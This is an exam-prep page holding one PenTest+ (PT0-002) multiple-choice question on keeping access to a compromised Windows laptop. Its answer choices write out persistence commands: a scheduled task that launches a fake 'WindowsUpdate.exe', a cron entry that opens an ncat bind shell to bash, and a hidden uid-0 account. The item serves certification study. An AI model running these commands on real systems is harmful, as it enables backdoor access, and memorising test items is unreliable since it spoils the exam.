ExamGecko
Question list
Search
Search

List of questions

Search

Related questions











Question 111 - PT0-002 discussion

Report
Export

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

A.
schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
Answers
A.
schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
B.
wmic startup get caption,command
Answers
B.
wmic startup get caption,command
C.
crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
Answers
C.
crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D.
sudo useradd -ou 0 -g 0 user
Answers
D.
sudo useradd -ou 0 -g 0 user
Suggested answer: A
asked 02/10/2024
Raed Abu-Haija
35 questions
User
Your answer:
0 comments
Sorted by

Leave a comment first